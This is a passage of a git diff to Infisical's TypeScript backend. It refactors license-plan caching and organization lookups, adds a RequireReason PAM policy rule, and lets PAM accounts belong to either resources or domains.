keyStore.getItem(FEATURE_CACHE_KEY(orgId)); + const cachedPlan = await keyStore.getItem(KeyStorePrefixes.LicenseCloudPlan(orgId)); if (cachedPlan) { logger.info(`getPlan: plan fetched from cache [orgId=${orgId}] [projectId=${projectId}]`); return JSON.parse(cachedPlan) as TFeatureSet; @@ -239,8 +238,8 @@ export const licenseServiceFactory = ({ currentPlan.identitiesUsed = identityUsed; await keyStore.setItemWithExpiry( - FEATURE_CACHE_KEY(org.id), - LICENSE_SERVER_CLOUD_PLAN_TTL, + KeyStorePrefixes.LicenseCloudPlan(org.id), + KeyStoreTtls.LicenseCloudPlanInSeconds, JSON.stringify(currentPlan) ); @@ -252,8 +251,8 @@ export const licenseServiceFactory = ({ `getPlan: encountered an error when fetching pan [orgId=${orgId}] [projectId=${projectId}] [error]` ); await keyStore.setItemWithExpiry( - FEATURE_CACHE_KEY(orgId), - LICENSE_SERVER_CLOUD_PLAN_TTL, + KeyStorePrefixes.LicenseCloudPlan(orgId), + KeyStoreTtls.LicenseCloudPlanInSeconds, JSON.stringify(onPremFeatures) ); return onPremFeatures; @@ -264,7 +263,7 @@ export const licenseServiceFactory = ({ }; const refreshPlan = async (orgId: string) => { - await keyStore.deleteItem(FEATURE_CACHE_KEY(orgId)); + await keyStore.deleteItem(KeyStorePrefixes.LicenseCloudPlan(orgId)); if (instanceType === InstanceType.Cloud) { await getPlan(orgId); } @@ -307,7 +306,7 @@ export const licenseServiceFactory = ({ quantityIdentities }); } - await keyStore.deleteItem(FEATURE_CACHE_KEY(rootOrgId)); + await keyStore.deleteItem(KeyStorePrefixes.LicenseCloudPlan(rootOrgId)); } else if (instanceType === InstanceType.EnterpriseOnPrem) { const usedSeats = await licenseDAL.countOfOrgMembers(null, tx); const usedIdentitySeats = await licenseDAL.countOrgUsersAndIdentities(null, tx); @@ -391,7 +390,7 @@ export const licenseServiceFactory = ({ OrgPermissionSubjects.Billing ); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if 
(!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -406,7 +405,7 @@ export const licenseServiceFactory = ({ `/api/license-server/v1/customers/${organization.customerId}/session/trial`, { success_url } ); - await keyStore.deleteItem(FEATURE_CACHE_KEY(orgId)); + await keyStore.deleteItem(KeyStorePrefixes.LicenseCloudPlan(orgId)); return { url }; }; @@ -430,7 +429,7 @@ export const licenseServiceFactory = ({ OrgPermissionSubjects.Billing ); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: "Organization not found" @@ -498,7 +497,7 @@ export const licenseServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(OrgPermissionBillingActions.Read, OrgPermissionSubjects.Billing); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -581,7 +580,7 @@ export const licenseServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(OrgPermissionBillingActions.Read, OrgPermissionSubjects.Billing); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -625,7 +624,7 @@ export const licenseServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(OrgPermissionBillingActions.Read, OrgPermissionSubjects.Billing); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new 
NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -660,7 +659,7 @@ export const licenseServiceFactory = ({ OrgPermissionSubjects.Billing ); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -687,7 +686,7 @@ export const licenseServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(OrgPermissionBillingActions.Read, OrgPermissionSubjects.Billing); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -724,7 +723,7 @@ export const licenseServiceFactory = ({ OrgPermissionSubjects.Billing ); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -763,7 +762,7 @@ export const licenseServiceFactory = ({ OrgPermissionSubjects.Billing ); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -799,7 +798,7 @@ export const licenseServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(OrgPermissionBillingActions.Read, OrgPermissionSubjects.Billing); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID 
'${orgId}' not found` @@ -827,7 +826,7 @@ export const licenseServiceFactory = ({ OrgPermissionSubjects.Billing ); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -858,7 +857,7 @@ export const licenseServiceFactory = ({ OrgPermissionSubjects.Billing ); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -882,7 +881,7 @@ export const licenseServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(OrgPermissionBillingActions.Read, OrgPermissionSubjects.Billing); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -906,7 +905,7 @@ export const licenseServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(OrgPermissionBillingActions.Read, OrgPermissionSubjects.Billing); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -920,7 +919,7 @@ export const licenseServiceFactory = ({ }; const invalidateGetPlan = async (orgId: string) => { - await keyStore.deleteItem(FEATURE_CACHE_KEY(orgId)); + await keyStore.deleteItem(KeyStorePrefixes.LicenseCloudPlan(orgId)); }; const getCustomerId = () => { diff --git a/backend/src/ee/services/license/license-types.ts 
b/backend/src/ee/services/license/license-types.ts index bd556a50658..6dd0214a988 100644 --- a/backend/src/ee/services/license/license-types.ts +++ b/backend/src/ee/services/license/license-types.ts @@ -84,6 +84,7 @@ export type TFeatureSet = { projectTemplates: false; kmip: false; gateway: false; + gatewayPool: false; sshHostGroups: false; secretScanning: false; enterpriseSecretSyncs: false; diff --git a/backend/src/ee/services/oidc/oidc-config-service.ts b/backend/src/ee/services/oidc/oidc-config-service.ts index 65cc514796a..8043d351495 100644 --- a/backend/src/ee/services/oidc/oidc-config-service.ts +++ b/backend/src/ee/services/oidc/oidc-config-service.ts @@ -15,7 +15,9 @@ import { OrgPermissionSsoActions, OrgPermissionSubjects } from "@app/ee/services import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { getConfig } from "@app/lib/config/env"; import { BadRequestError, ForbiddenRequestError, NotFoundError, OidcAuthError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { OrgServiceActor } from "@app/lib/types"; import { @@ -197,7 +199,6 @@ export const oidcConfigServiceFactory = ({ }); } - // Verify that the email domain (if verified on the platform) belongs to this org await verifyEmailDomainOwnership({ email, orgId, emailDomainDAL }); const sanitizedEmail = sanitizeEmail(email); validateEmail(sanitizedEmail); @@ -208,7 +209,7 @@ export const oidcConfigServiceFactory = ({ aliasType: UserAliasType.OIDC }); - const organization = await orgDAL.findOrgById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if 
(!organization) throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` }); let user: TUsers; @@ -420,7 +421,7 @@ export const oidcConfigServiceFactory = ({ await smtpService .sendMail({ template: SmtpTemplates.EmailVerification, - subjectLine: "Infisical confirmation code", + subjectLine: `Infisical confirmation code: ${token}`, recipients: [user.email], substitutions: { code: token diff --git a/backend/src/ee/services/pam-account-policy/pam-account-policy-constants.ts b/backend/src/ee/services/pam-account-policy/pam-account-policy-constants.ts index 1206b2c7c2b..c6f9069a834 100644 --- a/backend/src/ee/services/pam-account-policy/pam-account-policy-constants.ts +++ b/backend/src/ee/services/pam-account-policy/pam-account-policy-constants.ts @@ -4,7 +4,8 @@ import { PamAccountPolicyRuleType } from "./pam-account-policy-enums"; export const PAM_ACCOUNT_POLICY_RULE_SUPPORTED_RESOURCES: Record = { [PamAccountPolicyRuleType.CommandBlocking]: [PamResource.SSH], - [PamAccountPolicyRuleType.SessionLogMasking]: "all" + [PamAccountPolicyRuleType.SessionLogMasking]: "all", + [PamAccountPolicyRuleType.RequireReason]: "all" }; export const PAM_ACCOUNT_POLICY_RULE_METADATA: Record = @@ -16,5 +17,9 @@ export const PAM_ACCOUNT_POLICY_RULE_METADATA: Record; export const pamAccountDALFactory = (db: TDbClient) => { const orm = ormify(db, TableName.PamAccount); - const findByProjectIdWithResourceDetails = async ( + const findByProjectIdWithParentDetails = async ( { projectId, folderId, @@ -26,6 +26,7 @@ export const pamAccountDALFactory = (db: TDbClient) => { orderBy = PamAccountOrderBy.Name, orderDirection = OrderByDirection.ASC, filterResourceIds, + filterDomainIds, metadataFilter }: { projectId: string; @@ -37,6 +38,7 @@ export const pamAccountDALFactory = (db: TDbClient) => { orderBy?: PamAccountOrderBy; orderDirection?: OrderByDirection; filterResourceIds?: string[]; + filterDomainIds?: string[]; metadataFilter?: Array<{ key: string; value?: string }>; }, 
tx?: Knex @@ -45,6 +47,7 @@ export const pamAccountDALFactory = (db: TDbClient) => { const dbInstance = tx || db.replicaNode(); const query = dbInstance(TableName.PamAccount) .leftJoin(TableName.PamResource, `${TableName.PamAccount}.resourceId`, `${TableName.PamResource}.id`) + .leftJoin(TableName.PamDomain, `${TableName.PamAccount}.domainId`, `${TableName.PamDomain}.id`) .leftJoin(TableName.PamAccountPolicy, `${TableName.PamAccount}.policyId`, `${TableName.PamAccountPolicy}.id`) .where(`${TableName.PamAccount}.projectId`, projectId); @@ -67,12 +70,24 @@ export const pamAccountDALFactory = (db: TDbClient) => { void q .whereRaw(`??.?? ILIKE ? ESCAPE '\\'`, [TableName.PamAccount, "name", pattern]) .orWhereRaw(`??.?? ILIKE ? ESCAPE '\\'`, [TableName.PamResource, "name", pattern]) + .orWhereRaw(`??.?? ILIKE ? ESCAPE '\\'`, [TableName.PamDomain, "name", pattern]) .orWhereRaw(`??.?? ILIKE ? ESCAPE '\\'`, [TableName.PamAccount, "description", pattern]); }); } - if (filterResourceIds && filterResourceIds.length) { + const hasResourceFilter = filterResourceIds && filterResourceIds.length > 0; + const hasDomainFilter = filterDomainIds && filterDomainIds.length > 0; + + if (hasResourceFilter && hasDomainFilter) { + void query.where((qb) => { + void qb + .whereIn(`${TableName.PamAccount}.resourceId`, filterResourceIds) + .orWhereIn(`${TableName.PamAccount}.domainId`, filterDomainIds); + }); + } else if (hasResourceFilter) { void query.whereIn(`${TableName.PamAccount}.resourceId`, filterResourceIds); + } else if (hasDomainFilter) { + void query.whereIn(`${TableName.PamAccount}.domainId`, filterDomainIds); } if (metadataFilter && metadataFilter.length > 0) { @@ -82,10 +97,16 @@ export const pamAccountDALFactory = (db: TDbClient) => { const countQuery = query.clone().count("*", { as: "count" }).first(); void query.select(selectAllTableCols(TableName.PamAccount)).select( - // resource + // resource (may be null for domain accounts) 
db.ref("name").withSchema(TableName.PamResource).as("resourceName"), db.ref("resourceType").withSchema(TableName.PamResource), - db.ref("encryptedRotationAccountCredentials").withSchema(TableName.PamResource), + db + .ref("encryptedRotationAccountCredentials") + .withSchema(TableName.PamResource) + .as("resourceEncryptedRotationAccountCredentials"), + // domain (may be null for resource accounts) + db.ref("name").withSchema(TableName.PamDomain).as("domainName"), + db.ref("domainType").withSchema(TableName.PamDomain), // policy db.ref("name").withSchema(TableName.PamAccountPolicy).as("policyName") ); @@ -101,66 +122,110 @@ export const pamAccountDALFactory = (db: TDbClient) => { const [results, countResult] = await Promise.all([query, countQuery]); const totalCount = Number(countResult?.count || 0); - const accounts = results.map( - // @ts-expect-error resourceName, resourceType, encryptedRotationAccountCredentials, policyName are from joined tables - ({ resourceId, resourceName, resourceType, encryptedRotationAccountCredentials, policyName, ...account }) => ({ - ...account, - resourceId, - policyName: (policyName as string) || null, - resource: { - id: resourceId, - name: resourceName as string, - resourceType, - encryptedRotationAccountCredentials - } - }) - ); + const accounts = results.map((row) => { + const r = row as Record; + const rId = row.resourceId as string | null; + const dId = row.domainId as string | null; + + return { + ...row, + resourceId: rId, + domainId: dId, + policyName: (r.policyName as string) || null, + resource: rId + ? { + id: rId, + name: r.resourceName as string, + resourceType: r.resourceType as string, + encryptedRotationAccountCredentials: r.resourceEncryptedRotationAccountCredentials as Buffer | null + } + : null, + domain: dId + ? 
{ + id: dId, + name: r.domainName as string, + domainType: r.domainType as string + } + : null + }; + }); + return { accounts, totalCount }; } catch (error) { - throw new DatabaseError({ error, name: "Find PAM accounts with resource details" }); + throw new DatabaseError({ error, name: "Find PAM accounts with parent details" }); } }; - const findByIdWithResourceDetails = async (accountId: string, tx?: Knex) => { + const findByIdWithParentDetails = async (accountId: string, tx?: Knex) => { try { const dbInstance = tx || db.replicaNode(); const result = await dbInstance(TableName.PamAccount) .leftJoin(TableName.PamResource, `${TableName.PamAccount}.resourceId`, `${TableName.PamResource}.id`) + .leftJoin(TableName.PamDomain, `${TableName.PamAccount}.domainId`, `${TableName.PamDomain}.id`) .leftJoin(TableName.PamAccountPolicy, `${TableName.PamAccount}.policyId`, `${TableName.PamAccountPolicy}.id`) .where(`${TableName.PamAccount}.id`, accountId) .select(selectAllTableCols(TableName.PamAccount)) .select( + // resource (may be null for domain accounts) db.ref("name").withSchema(TableName.PamResource).as("resourceName"), db.ref("resourceType").withSchema(TableName.PamResource), - db.ref("encryptedRotationAccountCredentials").withSchema(TableName.PamResource), + db + .ref("encryptedRotationAccountCredentials") + .withSchema(TableName.PamResource) + .as("resourceEncryptedRotationAccountCredentials"), + // domain (may be null for resource accounts) + db.ref("name").withSchema(TableName.PamDomain).as("domainName"), + db.ref("domainType").withSchema(TableName.PamDomain), db.ref("name").withSchema(TableName.PamAccountPolicy).as("policyName") ) .first(); if (!result) return null; - const { resourceId, resourceName, resourceType, encryptedRotationAccountCredentials, policyName, ...account } = - result as { - resourceId: string; - resourceName: string; - resourceType: string; - encryptedRotationAccountCredentials: Buffer | null; - policyName: string | null; - } & typeof result; + 
const { + resourceId, + domainId, + resourceName, + resourceType, + resourceEncryptedRotationAccountCredentials, + domainName, + domainType, + policyName, + ...account + } = result as { + resourceId: string | null; + domainId: string | null; + resourceName: string | null; + resourceType: string | null; + resourceEncryptedRotationAccountCredentials: Buffer | null; + domainName: string | null; + domainType: string | null; + policyName: string | null; + } & typeof result; return { ...account, resourceId, + domainId, policyName: policyName || null, - resource: { - id: resourceId, - name: resourceName, - resourceType, - encryptedRotationAccountCredentials - } + resource: resourceId + ? { + id: resourceId, + name: resourceName, + resourceType, + encryptedRotationAccountCredentials: resourceEncryptedRotationAccountCredentials + } + : null, + domain: domainId + ? { + id: domainId, + name: domainName, + domainType + } + : null }; } catch (error) { - throw new DatabaseError({ error, name: "Find PAM account by ID with resource details" }); + throw new DatabaseError({ error, name: "Find PAM account by ID with parent details" }); } }; @@ -179,14 +244,34 @@ export const pamAccountDALFactory = (db: TDbClient) => { return byAccountId; }; - const findRotationCandidates = async (resourceIds: string[], minIntervalSeconds: number, tx?: Knex) => { - if (!resourceIds.length) return []; + const findRotationCandidates = async ( + { + resourceIds, + domainIds, + minIntervalSeconds + }: { + resourceIds?: string[]; + domainIds?: string[]; + minIntervalSeconds: number; + }, + tx?: Knex + ) => { + const hasResourceIds = resourceIds && resourceIds.length > 0; + const hasDomainIds = domainIds && domainIds.length > 0; + if (!hasResourceIds && !hasDomainIds) return []; try { const cutoff = new Date(Date.now() - minIntervalSeconds * 1000); return await (tx || db.replicaNode())(TableName.PamAccount) - .whereIn("resourceId", resourceIds) + .where((qb) => { + if (hasResourceIds) { + void 
qb.whereIn("resourceId", resourceIds); + } + if (hasDomainIds) { + void qb.orWhereIn("domainId", domainIds); + } + }) .where((qb) => { void qb.whereNot("rotationStatus", "rotating").orWhereNull("rotationStatus"); }) @@ -203,8 +288,8 @@ export const pamAccountDALFactory = (db: TDbClient) => { return { ...orm, - findByProjectIdWithResourceDetails, - findByIdWithResourceDetails, + findByProjectIdWithParentDetails, + findByIdWithParentDetails, findMetadataByAccountIds, findRotationCandidates }; diff --git a/backend/src/ee/services/pam-account/pam-account-enums.ts b/backend/src/ee/services/pam-account/pam-account-enums.ts index 0c39e81bb67..dbaddeab206 100644 --- a/backend/src/ee/services/pam-account/pam-account-enums.ts +++ b/backend/src/ee/services/pam-account/pam-account-enums.ts @@ -1,3 +1,8 @@ +import { PamDomainType } from "../pam-domain/pam-domain-enums"; +import { PamResource } from "../pam-resource/pam-resource-enums"; + +export type PamParentType = PamResource | PamDomainType; + export enum PamAccountOrderBy { Name = "name" } diff --git a/backend/src/ee/services/pam-account/pam-account-fns.ts b/backend/src/ee/services/pam-account/pam-account-fns.ts index 679710e0ba7..493b5014367 100644 --- a/backend/src/ee/services/pam-account/pam-account-fns.ts +++ b/backend/src/ee/services/pam-account/pam-account-fns.ts @@ -1,10 +1,49 @@ import { TKmsServiceFactory } from "@app/services/kms/kms-service"; import { KmsDataKey } from "@app/services/kms/kms-types"; +import { KubernetesAuthMethod } from "../pam-resource/kubernetes/kubernetes-resource-enums"; import { PamResource } from "../pam-resource/pam-resource-enums"; import { TPamAccountCredentials, TPamResourceInternalMetadata } from "../pam-resource/pam-resource-types"; import { SSHAuthMethod } from "../pam-resource/ssh/ssh-resource-enums"; +type TAccountParentResource = { + id: string; + name: string; + resourceType: string; + encryptedRotationAccountCredentials?: Buffer | null; +}; + +type TAccountParentDomain = { + id: 
string; + name: string; + domainType: string; +}; + +export const formatAccountParent = ({ + resource, + domain +}: { + resource?: TAccountParentResource | null; + domain?: TAccountParentDomain | null; +}) => ({ + parentType: resource?.resourceType ?? domain?.domainType ?? "", + resource: resource + ? { + id: resource.id, + name: resource.name, + resourceType: resource.resourceType, + rotationCredentialsConfigured: Boolean(resource.encryptedRotationAccountCredentials) + } + : null, + domain: domain + ? { + id: domain.id, + name: domain.name, + domainType: domain.domainType + } + : null +}); + export const encryptAccountCredentials = async ({ projectId, credentials, @@ -69,11 +108,16 @@ export const decryptAccountMessage = async ({ }; // Returns false for account types where all credential fields are already visible in the sanitized view -export const hasSensitiveCredentials = (resourceType: string, credentials: TPamAccountCredentials): boolean => { - if (resourceType === PamResource.AwsIam) return false; - if (resourceType === PamResource.Kubernetes) return false; +export const hasSensitiveCredentials = (parentType: string, credentials: TPamAccountCredentials): boolean => { + if (parentType === PamResource.AwsIam) return false; + if ( + parentType === PamResource.Kubernetes && + "authMethod" in credentials && + credentials.authMethod === KubernetesAuthMethod.GatewayKubernetesAuth + ) + return false; if ( - resourceType === PamResource.SSH && + parentType === PamResource.SSH && "authMethod" in credentials && credentials.authMethod === SSHAuthMethod.Certificate ) @@ -87,6 +131,7 @@ const hasConfiguredCredentials = (credentials: TPamAccountCredentials): boolean if ("serviceAccountToken" in credentials && credentials.serviceAccountToken) return true; if ("targetRoleArn" in credentials && credentials.targetRoleArn) return true; if ("authMethod" in credentials && credentials.authMethod === SSHAuthMethod.Certificate) return true; + if ("authMethod" in credentials && 
credentials.authMethod === KubernetesAuthMethod.GatewayKubernetesAuth) return true; return false; }; diff --git a/backend/src/ee/services/pam-account/pam-account-service.ts b/backend/src/ee/services/pam-account/pam-account-service.ts index 59df0f1d083..32784ab54cb 100644 --- a/backend/src/ee/services/pam-account/pam-account-service.ts +++ b/backend/src/ee/services/pam-account/pam-account-service.ts @@ -2,9 +2,11 @@ import { ForbiddenError, subject } from "@casl/ability"; import picomatch from "picomatch"; import { ActionProjectType, OrganizationActionScope, TableName, TPamAccounts, TPamResources } from "@app/db/schemas"; +import { decryptDomainConnectionDetails } from "@app/ee/services/pam-domain/pam-domain-fns"; import { + exchangeCredentialsForConsoleUrl, extractAwsAccountIdFromArn, - generateConsoleFederationUrl, + generateAwsIamSessionCredentials, TAwsIamAccountCredentials } from "@app/ee/services/pam-resource/aws-iam"; import { parseMongoConnectionString } from "@app/ee/services/pam-resource/mongodb/mongodb-resource-factory"; @@ -23,6 +25,7 @@ import { import { createSshCert, createSshKeyPair } from "@app/ee/services/ssh/ssh-certificate-authority-fns"; import { SshCertType } from "@app/ee/services/ssh/ssh-certificate-authority-types"; import { SshCertKeyAlgorithm } from "@app/ee/services/ssh-certificate/ssh-certificate-types"; +import { KeyStorePrefixes, TKeyStoreFactory } from "@app/keystore/keystore"; import { DatabaseErrorCode } from "@app/lib/error-codes"; import { BadRequestError, @@ -32,6 +35,8 @@ import { PolicyViolationError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { OrgServiceActor } from "@app/lib/types"; import { TApprovalPolicyDALFactory } from "@app/services/approval-policy/approval-policy-dal"; import { ApprovalPolicyType } from 
"@app/services/approval-policy/approval-policy-enums"; @@ -57,6 +62,9 @@ import { TPamAccountPolicyDALFactory } from "../pam-account-policy/pam-account-p import { PamAccountPolicyRuleType } from "../pam-account-policy/pam-account-policy-enums"; import { TPolicyRules } from "../pam-account-policy/pam-account-policy-types"; import { TPamAccountDependenciesDALFactory } from "../pam-discovery/pam-account-dependencies-dal"; +import { TPamDomainDALFactory } from "../pam-domain/pam-domain-dal"; +import { PamDomainType } from "../pam-domain/pam-domain-enums"; +import { PAM_DOMAIN_FACTORY_MAP } from "../pam-domain/pam-domain-factory"; import { TPamResourceDALFactory } from "../pam-resource/pam-resource-dal"; import { PamResource } from "../pam-resource/pam-resource-enums"; import { TPamResourceRotationRulesDALFactory } from "../pam-resource/pam-resource-rotation-rules-dal"; @@ -73,6 +81,7 @@ import { decryptAccount, decryptAccountCredentials, encryptAccountCredentials, + formatAccountParent, hasSensitiveCredentials } from "./pam-account-fns"; import { @@ -86,6 +95,7 @@ import { type TPamAccountServiceFactoryDep = { pamResourceDAL: TPamResourceDALFactory; + pamDomainDAL: TPamDomainDALFactory; pamSessionDAL: TPamSessionDALFactory; pamAccountDAL: TPamAccountDALFactory; pamAccountPolicyDAL: Pick; @@ -111,6 +121,7 @@ type TPamAccountServiceFactoryDep = { TPamAccountDependenciesDALFactory, "findByAccountId" | "updateById" | "countByAccountIds" >; + keyStore: Pick; }; export type TPamAccountServiceFactory = ReturnType; @@ -119,6 +130,7 @@ const ROTATION_CONCURRENCY_LIMIT = 10; export const pamAccountServiceFactory = ({ pamResourceDAL, + pamDomainDAL, pamSessionDAL, pamAccountDAL, pamAccountPolicyDAL, @@ -135,12 +147,65 @@ export const pamAccountServiceFactory = ({ approvalRequestGrantsDAL, pamSessionExpirationService, resourceMetadataDAL, - pamAccountDependenciesDAL + pamAccountDependenciesDAL, + keyStore }: TPamAccountServiceFactoryDep) => { + // Helper to resolve account parent 
(resource or domain) + const resolveAccountParent = async ({ + resourceId, + domainId + }: { + resourceId?: string | null; + domainId?: string | null; + }) => { + if (resourceId) { + const resource = await pamResourceDAL.findById(resourceId); + if (!resource) throw new NotFoundError({ message: `Resource with ID '${resourceId}' not found` }); + return { + projectId: resource.projectId, + name: resource.name, + resourceType: resource.resourceType, + domainType: null as string | null, + gatewayId: resource.gatewayId, + encryptedConnectionDetails: resource.encryptedConnectionDetails, + encryptedResourceMetadata: resource.encryptedResourceMetadata, + encryptedRotationAccountCredentials: resource.encryptedRotationAccountCredentials, + isResource: true as const, + raw: resource + }; + } + if (!domainId) throw new BadRequestError({ message: "Either resourceId or domainId must be provided" }); + const domain = await pamDomainDAL.findById(domainId); + if (!domain) throw new NotFoundError({ message: `Domain with ID '${domainId}' not found` }); + return { + projectId: domain.projectId, + name: domain.name, + resourceType: null as string | null, + domainType: domain.domainType, + gatewayId: domain.gatewayId, + encryptedConnectionDetails: domain.encryptedConnectionDetails, + encryptedResourceMetadata: null as Buffer | null, + encryptedRotationAccountCredentials: null as Buffer | null, + isResource: false as const, + raw: domain + }; + }; + + // Resolve whether the given policy enforces RequireReason at access time. + // Surfaced on account responses so the UI can gate access without needing + // pam-account-policy:read permission. + const resolveRequireReason = async (policyId?: string | null) => { + if (!policyId) return false; + const policy = await pamAccountPolicyDAL.findById(policyId); + const policyRules = (policy?.rules ?? 
{}) as TPolicyRules; + return Boolean(policy?.isActive && policyRules[PamAccountPolicyRuleType.RequireReason]); + }; + const create = async ( { credentials, resourceId, + domainId, name, description, folderId, @@ -151,62 +216,74 @@ export const pamAccountServiceFactory = ({ }: TCreateAccountDTO, actor: OrgServiceActor ) => { - const resource = await pamResourceDAL.findById(resourceId); - if (!resource) throw new NotFoundError({ message: `Resource with ID '${resourceId}' not found` }); + const parent = await resolveAccountParent({ resourceId, domainId }); const { permission } = await permissionService.getProjectPermission({ actor: actor.type, actorAuthMethod: actor.authMethod, actorId: actor.id, actorOrgId: actor.orgId, - projectId: resource.projectId, + projectId: parent.projectId, actionProjectType: ActionProjectType.PAM }); ForbiddenError.from(permission).throwUnlessCan( ProjectPermissionPamAccountActions.Create, subject(ProjectPermissionSub.PamAccounts, { - resourceName: resource.name, accountName: name, - resourceType: resource.resourceType, + ...(parent.isResource && { resourceName: parent.name, resourceType: parent.resourceType }), + ...(!parent.isResource && { domainName: parent.name, domainType: parent.domainType }), metadata: (metadata || []).map(({ key, value }) => ({ key, value: value ?? "" })) }) ); - const connectionDetails = await decryptResourceConnectionDetails({ - projectId: resource.projectId, - encryptedConnectionDetails: resource.encryptedConnectionDetails, - kmsService - }); - - // Decrypt resource metadata if available - const resourceInternalMetadata = resource.encryptedResourceMetadata - ? 
await decryptResourceMetadata({ - encryptedMetadata: resource.encryptedResourceMetadata, - projectId: resource.projectId, - kmsService - }) - : undefined; - - const factory = PAM_RESOURCE_FACTORY_MAP[resource.resourceType as PamResource]( - resource.resourceType as PamResource, - connectionDetails, - resource.gatewayId, - gatewayV2Service, - resource.projectId, - resourceInternalMetadata - ); + let factory; + if (parent.isResource) { + const connectionDetails = await decryptResourceConnectionDetails({ + projectId: parent.projectId, + encryptedConnectionDetails: parent.encryptedConnectionDetails, + kmsService + }); + const resourceInternalMetadata = parent.encryptedResourceMetadata + ? await decryptResourceMetadata({ + encryptedMetadata: parent.encryptedResourceMetadata, + projectId: parent.projectId, + kmsService + }) + : undefined; + factory = PAM_RESOURCE_FACTORY_MAP[parent.resourceType as PamResource]( + parent.resourceType as PamResource, + connectionDetails, + parent.gatewayId, + gatewayV2Service, + parent.projectId, + resourceInternalMetadata + ); + } else { + const connectionDetails = await decryptDomainConnectionDetails({ + projectId: parent.projectId, + encryptedConnectionDetails: parent.encryptedConnectionDetails, + kmsService + }); + factory = PAM_DOMAIN_FACTORY_MAP[parent.domainType as PamDomainType]( + parent.domainType as PamDomainType, + connectionDetails, + parent.gatewayId, + gatewayV2Service, + parent.projectId + ); + } const validatedCredentials = await factory.validateAccountCredentials(credentials); const encryptedCredentials = await encryptAccountCredentials({ credentials: validatedCredentials, - projectId: resource.projectId, + projectId: parent.projectId, kmsService }); if (policyId) { const policy = await pamAccountPolicyDAL.findById(policyId); - if (!policy || policy.projectId !== resource.projectId) { + if (!policy || policy.projectId !== parent.projectId) { throw new NotFoundError({ message: "Policy not found" }); } } @@ -215,8 +292,9 @@ 
